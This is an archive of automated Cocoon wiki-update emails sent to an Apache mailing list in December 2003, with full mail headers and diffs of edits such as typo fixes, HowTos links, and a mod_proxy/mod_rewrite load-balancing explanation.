mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto - } - SPAN.EmailStyle19 { - FONT-WEIGHT: normal; COLOR: black; FONT-STYLE: normal; FONT-FAMILY: Arial; TEXT-DECORATION: none; text-underline: none; mso-style-type: personal; mso-style-noshow: yes; mso-ansi-font-size: 12.0pt; mso-bidi-font-size: 12.0pt; mso-ascii-font-family: Arial; mso-hansi-font-family: Arial; mso-bidi-font-family: Arial; mso-text-animation: none; text-line-through: none - } - SPAN.EmailStyle20 { - COLOR: navy; FONT-FAMILY: Arial; mso-style-type: personal-reply; mso-style-noshow: yes; mso-ansi-font-size: 10.0pt; mso-bidi-font-size: 10.0pt; mso-ascii-font-family: Arial; mso-hansi-font-family: Arial; mso-bidi-font-family: Arial - } - DIV.Section1 { - page: Section1 - } - </STYLE> - <!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="1026" /></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1" /> </o:shapelayout></xml><![endif]--></HEAD> - <BODY lang=EN-US id=MailContainerBody style="tab-interval: 36.0pt" vLink=purple - link=blue bgColor=white leftMargin=0 - background=ATT-0-3B9A5A7A6E1AD811B413000255919F4A-ATT00008.gif topMargin=0 - name="Compose message area" CanvasTabStop="true" acc_role="text" - hb_focus_attach="true"> - <DIV>&nbsp;</DIV> - <DIV class=OutlookMessageHeader dir=ltr align=left><BR></FONT></DIV> - <DIV id=0></DIV><BR><SPAN id=hbblock> - <P></P></SPAN> - <P></P></BODY></HTML> - </FONT></P> - Page: http://wiki.cocoondev.org/Wiki.jsp?page=3DJNDIDatasourceWithBorlandEnterpriseServer5.1 , version: 2 on Tue Dec 2 16:13:57 2003 by JoergHeinicke - lalakis from guatemala!!! + Page: http://wiki.cocoondev.org/Wiki.jsp?page=DeleteMe , version: 31 on Tue Dec 2 16:14:49 2003 by JoergHeinicke - * [George Dimitrakopoulos] ? ^ + * [George+Dimitrakopoulos] ? ^ From [email protected] Tue Dec 02 20:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54032 invoked from network); 2 Dec 2003 20:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 20:00:10 -0000 Received: (qmail 15971 invoked by uid 500); 2 Dec 2003 19:59:59 -0000 Delivered-To: [email protected] Received: (qmail 15940 invoked by uid 500); 2 Dec 2003 19:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15927 invoked from network); 2 Dec 2003 19:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 19:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2K02p13985 for <[email protected]>; Tue, 2 Dec 2003 21:00:03 +0100 Date: Tue, 2 Dec 2003 21:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] PDFGenerator Tue Dec 2 21:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=PDFGenerator , version: 3 on Tue Dec 2 19:09:08 2003 by Con - WHere can i find it? ? ^ + Where can i find it? ? ^ - See [FOP] + See [FOP], which is a PDF Serializer. AFAIK there is no PDF Generator in Cocoon. + From [email protected] Tue Dec 02 23:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46813 invoked from network); 2 Dec 2003 23:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 23:00:16 -0000 Received: (qmail 71962 invoked by uid 500); 2 Dec 2003 22:59:58 -0000 Delivered-To: [email protected] Received: (qmail 71908 invoked by uid 500); 2 Dec 2003 22:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71833 invoked from network); 2 Dec 2003 22:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 22:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2N03p14058 for <[email protected]>; Wed, 3 Dec 2003 00:00:04 +0100 Date: Wed, 3 Dec 2003 00:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ArthurBogaart Wed Dec 3 00:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ArthurBogaart , version: 10 on Tue Dec 2 22:14:34 2003 by 161.129.204.104 - Started using a copmuter when I was 16, mainly playing doom. A computer functioned to me just like the [Pythagorean Theorem|http://www.pbs.org/wgbh/nova/proof/puzzle/theorem.html] functioned to most of the girls in my math class. I didn't have a clue. Luckily I had a friend with experience in windows 3.11, but we never got any further than bash scripting and waiting. Waiting untill the 25th floppy of SpaceQuest X was finally ready unzipping.. My first real understanding and programming in java came during my computer science study, which I'm hopefully ending next year. ? ----------------------------------------------------------------------------------------------------------------------------------- + Started using a copmuter when I was 16, mainly playing doom. A computer functioned to me just like the [Pythagorean Theorem|http://www.pbs.org/wgbh/nova/proof/puzzle/theorem.html] functioned to most of the girls in my math class. I didn't have a clue. Luckily I had a friend with experience in windows 3.11, but we never got any further than bash scripting and waiting. Waiting untill the 25th floppy of SpaceQuest X was finally ready unzipping.. + \\My first real understanding and programming in java came during my computer science study, which I'm hopefully ending next year. - When my collegue [Unico|http://wiki.cocoondev.org/Wiki.jsp?page=UnicoHommes] got interested in Cocoon1 we had to build a website with it. There was already some experience with xml in ASP, but using a pipeline never came to my mind. I was do-whiling dom nodes in order to get a <table/> filled...\\ ? ^ + When my collegue [Unico|http://wiki.cocoondev.org/Wiki.jsp?page=UnicoHommes] got interested in Cocoon2 we had to build a website with it. There was already some experience with xml in ASP, but using a pipeline never came to my mind. I was do-whiling dom nodes in order to get a <table/> filled...\\ ? ^ - And then came the light, Cocoon2, no more restarting after editing the sitemap and performance. Since that day all our ASP books (those big red wrox ones) vanished from the bookshelfs and started a new life as 19" monitor supports! :D + And then came the light, Cocoon2.1, no more restarting after editing the sitemap and performance. Since that day all our ASP books (those big red wrox ones) vanished from the bookshelfs and started a new life as 19" monitor supports! :D ? ++ From [email protected] Wed Dec 03 05:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1609 invoked from network); 3 Dec 2003 05:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Dec 2003 05:00:17 -0000 Received: (qmail 801 invoked by uid 500); 3 Dec 2003 04:59:57 -0000 Delivered-To: [email protected] Received: (qmail 701 invoked by uid 500); 3 Dec 2003 04:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 648 invoked from network); 3 Dec 2003 04:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 04:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB3504p14565 for <[email protected]>; Wed, 3 Dec 2003 06:00:05 +0100 Date: Wed, 3 Dec 2003 06:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowTos Wed Dec 3 06:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowTos , version: 151 on Wed Dec 3 04:56:30 2003 by 161.129.204.104 - !! Bugilla + !! Bugzilla ? + From [email protected] Wed Dec 03 06:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22807 invoked from network); 3 Dec 2003 06:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Dec 2003 06:00:16 -0000 Received: (qmail 47761 invoked by uid 500); 3 Dec 2003 05:59:54 -0000 Delivered-To: [email protected] Received: (qmail 47733 invoked by uid 500); 3 Dec 2003 05:59:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47720 invoked from network); 3 Dec 2003 05:59:53 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 05:59:53 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB3603p14592 for <[email protected]>; Wed, 3 Dec 2003 07:00:04 +0100 Date: Wed, 3 Dec 2003 07:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonWebsiteUpdate Wed Dec 3 07:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonWebsiteUpdate , version: 10 on Wed Dec 3 05:22:59 2003 by DavidCrossley - * Check whether all files you left over there are g+w so others can work from where you left. ? ^ --- ^^ ^ ^^ + * Double-check that all files you left over there are g+w so others can work from where you finished. ? ^^^^^^^^ ^^ ^^^^^^ ^ From [email protected] Wed Dec 03 11:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59755 invoked from network); 3 Dec 2003 11:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Dec 2003 11:00:17 -0000 Received: (qmail 15693 invoked by uid 500); 3 Dec 2003 10:59:50 -0000 Delivered-To: [email protected] Received: (qmail 15674 invoked by uid 500); 3 Dec 2003 10:59:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15662 invoked from network); 3 Dec 2003 10:59:49 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 10:59:49 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB3B02p14770 for <[email protected]>; Wed, 3 Dec 2003 12:00:02 +0100 Date: Wed, 3 Dec 2003 12:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] SandBox Wed Dec 3 12:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=SandBox , version: 203 on Wed Dec 3 10:45:59 2003 by 161.129.204.104 From [email protected] Wed Dec 03 13:00:27 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27719 invoked from network); 3 Dec 2003 13:00:27 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Dec 2003 13:00:27 -0000 Received: (qmail 92560 invoked by uid 500); 3 Dec 2003 13:00:04 -0000 Delivered-To: [email protected] Received: (qmail 92478 invoked by uid 500); 3 Dec 2003 13:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92386 invoked from network); 3 Dec 2003 13:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 13:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB3D03p14865 for <[email protected]>; Wed, 3 Dec 2003 14:00:03 +0100 Date: Wed, 3 Dec 2003 14:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowTos Wed Dec 3 14:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowTos , version: 152 on Wed Dec 3 12:11:06 2003 by AndrewSavory - * __[CInclud|Using CInclude]__ -- How to use CInclude to include dynamic content to your pages. + * __[CInclude|Using CInclude]__ -- How to use CInclude to include dynamic content to your pages. ? + - From [email protected] Wed Dec 03 14:00:20 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68354 invoked from network); 3 Dec 2003 14:00:20 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Dec 2003 14:00:20 -0000 Received: (qmail 10547 invoked by uid 500); 3 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 10520 invoked by uid 500); 3 Dec 2003 14:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10507 invoked from network); 3 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB3E03p14940 for <[email protected]>; Wed, 3 Dec 2003 15:00:04 +0100 Date: Wed, 3 Dec 2003 15:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Recipes FirstFridayDecember2003 Wed Dec 3 15:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Recipes , version: 5 on Wed Dec 3 13:18:19 2003 by StavrosKounis - *[Recipe XSP send mail example] | ] + *[XSP send mail example | Recipe XSP send mail example] Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 12 on Wed Dec 3 13:19:39 2003 by JoergHeinicke - * The slide support seems to be broken ([Bugzilla 24964|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=24964]). - ** the param values seems to be decoded once to much: see analysis for [RequestGenerator|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=106796038708692&w=2] ([Bug 25132|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25132]) and for [RawRequestParameterModule|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=107030283812533&w=4] ([thread view|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=4], [Bug 21502|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25102]) ? ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- + ** the param values seems to be decoded once to much: see analysis for [RawRequestParameterModule|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=107030283812533&w=4] ([thread view|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=4], [Bug 21502|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25102]) From [email protected] Wed Dec 03 18:00:22 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30414 invoked from network); 3 Dec 2003 18:00:22 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Dec 2003 18:00:22 -0000 Received: (qmail 69965 invoked by uid 500); 3 Dec 2003 18:00:01 -0000 Delivered-To: [email protected] Received: (qmail 69915 invoked by uid 500); 3 Dec 2003 18:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69904 invoked from network); 3 Dec 2003 18:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 18:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB3I02p15360 for <[email protected]>; Wed, 3 Dec 2003 19:00:03 +0100 Date: Wed, 3 Dec 2003 19:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ArthurBogaart Wed Dec 3 19:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ArthurBogaart , version: 11 on Wed Dec 3 17:39:48 2003 by 161.129.204.104 - Started using a copmuter when I was 16, mainly playing doom. A computer functioned to me just like the [Pythagorean Theorem|http://www.pbs.org/wgbh/nova/proof/puzzle/theorem.html] functioned to most of the girls in my math class. I didn't have a clue. Luckily I had a friend with experience in windows 3.11, but we never got any further than bash scripting and waiting. Waiting untill the 25th floppy of SpaceQuest X was finally ready unzipping.. ? - + Started using a computer when I was 16, mainly playing doom. A computer functioned to me just like the [Pythagorean Theorem|http://www.pbs.org/wgbh/nova/proof/puzzle/theorem.html] functioned to most of the girls in my math class. I didn't have a clue. Luckily I had a friend with experience in windows 3.11, but we never got any further than bash scripting and waiting. Waiting untill the 25th floppy of SpaceQuest X was finally ready unzipping.. ? + From [email protected] Wed Dec 03 23:00:24 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91006 invoked from network); 3 Dec 2003 23:00:24 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Dec 2003 23:00:24 -0000 Received: (qmail 12371 invoked by uid 500); 3 Dec 2003 22:59:58 -0000 Delivered-To: [email protected] Received: (qmail 12349 invoked by uid 500); 3 Dec 2003 22:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12338 invoked from network); 3 Dec 2003 22:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 22:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB3N03p15479 for <[email protected]>; Thu, 4 Dec 2003 00:00:03 +0100 Date: Thu, 4 Dec 2003 00:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LoadBalancingWithModProxy Thu Dec 4 00:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LoadBalancingWithModProxy , version: 4 on Wed Dec 3 23:08:40 2003 by TonyCollen - It came out recently on [email protected] a little "joke" about mod_jk versus mod_proxy, which is better, and so on... ? - + It came out recently on [email protected] a little "joke" about mod_jk versus mod_proxy, which is better, and so on... - Of course, I'm full-on promoting proxy, but my friends Noel J. Bergman and Glenn Nielsen had one question: how do I load balance a pool of backend servlet container using mod_proxy? This is a feature directly supported by mod_jk, but there doesn't seem to be an easy way to do this with more "standard" (or distributed in the core of Apache 2.0) modules. ? - - - - + Of course, I'm full-on promoting proxy, but my friends Noel J. Bergman and Glenn Nielsen had one question: how do I load balance a pool of backend servlet container using mod_proxy? This is a feature directly supported by mod_jk, but there doesn't seem to be an easy way to do this with more "standard" (or distributed in the core of Apache 2.0) modules. - Well, there is a way: go down and buy a Cisco load balancer, because if you need to have that kind of environment, I'm sure you're going also to have the money to buy one of those nice little gadgets. ? - - + Well, there is a way: go down and buy a Cisco load balancer, because if you need to have that kind of environment, I'm sure you're going also to have the money to buy one of those nice little gadgets. - But wait, what if (for example) you don't want to go down the hardware route? As I outlined in a page on the Cocoon Wiki available at [ApacheModProxy], remember that also mod_rewrite is one _very_ good friend. ? - + But wait, what if (for example) you don't want to go down the hardware route? As I outlined in a page on the Cocoon Wiki available at [ApacheModProxy], remember that also mod_rewrite is one _very_ good friend. - And in case of load balancing, well, mod_proxy and mod_rewrite come together to offer a pretty optimal solution, and incredibly enough, available with only 5 lines of configurations in your "httpd.conf". ? - + And in case of load balancing, well, mod_proxy and mod_rewrite come together to offer a pretty optimal solution, and incredibly enough, available with only 5 lines of configurations in your "httpd.conf". - Let's point out that my description is based on the implementation provided by Jetty, as I am familiar with its configuration, but other servlet containers might just provide the same functionality. ? - + Let's point out that my description is based on the implementation provided by Jetty, as I am familiar with its configuration, but other servlet containers might just provide the same functionality. - The feature "required" is the ability to specify a well-known string in the session manger, so that each generated session will be identifiable by Apache. In Jetty this feature is called "WorkerName" and it is available on all session managers. ? - + The feature "required" is the ability to specify a well-known string in the session manger, so that each generated session will be identifiable by Apache. In Jetty this feature is called "WorkerName" and it is available on all session managers. - Now, to the Apache configuration. The first thing we have to do is to create a "RewriteMap" file where all the different associations LBx -> hostname:port will be kept. For example, I call mine "balancing.conf", and here is what I have inside: ? - + Now, to the Apache configuration. The first thing we have to do is to create a "RewriteMap" file where all the different associations LBx -> hostname:port will be kept. For example, I call mine "balancing.conf", and here is what I have inside: - Now, in addition to all I've previously said on mod_proxy in the Wiki, this are the relevant bits to make sure that Apache 2.0 will load balance your web applications on all backend machnes, and that it will do so by also keeping session affinity. ? - + Now, in addition to all I've previously said on mod_proxy in the Wiki, this are the relevant bits to make sure that Apache 2.0 will load balance your web applications on all backend machnes, and that it will do so by also keeping session affinity. - The first line (RewriteMap) will simply tell Apache to load a map called "SERVERS" of "rnd" type. Look up what that means in the mod_rewrite configuration, but it basically implies that when I'm going to do a lookup for the server associated with the "ALL" key, I will be given one of the three different backend entries, randomly selected (for load balancing). ? - + The first line (RewriteMap) will simply tell Apache to load a map called "SERVERS" of "rnd" type. Look up what that means in the mod_rewrite configuration, but it basically implies that when I'm going to do a lookup for the server associated with the "ALL" key, I will be given one of the three different backend entries, randomly selected (for load balancing). - Given our example, if the cookie looks like "jsessionid=XXXXX.LB2", the lookup will make it so that the request will be proxied to http://backend2.betaversion.org:8080/..... ? - + Given our example, if the cookie looks like "jsessionid=XXXXX.LB2", the lookup will make it so that the request will be proxied to http://backend2.betaversion.org:8080/..... - The second "RewriteRule" will do exactly the same of the first "RewriteCond/RewriteRule" set, but will actually act on the request URI. This works in case your client doesn't support cookies (or, Cocoon folks, replace jsessionid with continuationid, and you have the flow load balanced in a second!). ? - - + The second "RewriteRule" will do exactly the same of the first "RewriteCond/RewriteRule" set, but will actually act on the request URI. This works in case your client doesn't support cookies (or, Cocoon folks, replace jsessionid with continuationid, and you have the flow load balanced in a second!). - So, if a request comes in as /webapp/index.jsp;jsessionid=XXXX.LB3, it will be proxied to http://backend2.betaversion.org:8888/webapp/index.jsp; jsessionid=XXXX.LB3 ... ? - + So, if a request comes in as /webapp/index.jsp;jsessionid=XXXX.LB3, it will be proxied to http://backend2.betaversion.org:8888/webapp/index.jsp; jsessionid=XXXX.LB3 ... - This rule simply takes any request not containing an appropriate session ID (cookie or URL) and will proxy it to ONE OF the backend servers at random, therefore literally balancing your requests on a pool of backend servers. ? ^^ - + This rule simply takes any request not containing an appropriate session ID (cookie or URL) and will proxy it to ONE of the backend servers at random, therefore literally balancing your requests on a pool of backend servers. ? ^^ - Read the detailed documentation of mod_proxy and mod_rewrite, especially for the RewriteMap directive, and you'll see precisely what I mean... ? - + Read the detailed documentation of mod_proxy and mod_rewrite, especially for the RewriteMap directive, and you'll see precisely what I mean... From [email protected] Thu Dec 04 00:00:26 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19190 invoked from network); 4 Dec 2003 00:00:25 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 00:00:25 -0000 Received: (qmail 492 invoked by uid 500); 3 Dec 2003 23:59:59 -0000 Delivered-To: [email protected] Received: (qmail 460 invoked by uid 500); 3 Dec 2003 23:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 448 invoked from network); 3 Dec 2003 23:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 3 Dec 2003 23:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4004p15506 for <[email protected]>; Thu, 4 Dec 2003 01:00:04 +0100 Date: Thu, 4 Dec 2003 01:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LoadBalancingWithModProxy Main Thu Dec 4 01:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LoadBalancingWithModProxy , version: 6 on Wed Dec 3 23:10:40 2003 by TonyCollen - ''(This was originally posted to cocoon-dev by [PierFumagalli])'' + ''(This was originally posted to [cocoon-dev|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=107049164914770&w=2] by [PierFumagalli])'' Page: http://wiki.cocoondev.org/Wiki.jsp?page=Main , version: 309 on Wed Dec 3 23:14:40 2003 by TonyCollen + * December 3, 2003 + ** Added [LoadBalancingWithModProxy] -- [TonyCollen] From [email protected] Thu Dec 04 06:00:28 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45575 invoked from network); 4 Dec 2003 06:00:28 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 06:00:28 -0000 Received: (qmail 98625 invoked by uid 500); 4 Dec 2003 05:59:54 -0000 Delivered-To: [email protected] Received: (qmail 98598 invoked by uid 500); 4 Dec 2003 05:59:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98587 invoked from network); 4 Dec 2003 05:59:53 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 05:59:53 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4603p16004 for <[email protected]>; Thu, 4 Dec 2003 07:00:03 +0100 Date: Thu, 4 Dec 2003 07:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] SandBox Thu Dec 4 07:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=SandBox , version: 204 on Thu Dec 4 05:19:58 2003 by 161.129.204.104 + \\Comment + + Hello world2 + From [email protected] Thu Dec 04 09:00:35 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29602 invoked from network); 4 Dec 2003 09:00:34 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 09:00:34 -0000 Received: (qmail 48301 invoked by uid 500); 4 Dec 2003 08:59:58 -0000 Delivered-To: [email protected] Received: (qmail 48169 invoked by uid 500); 4 Dec 2003 08:59:57 -0000 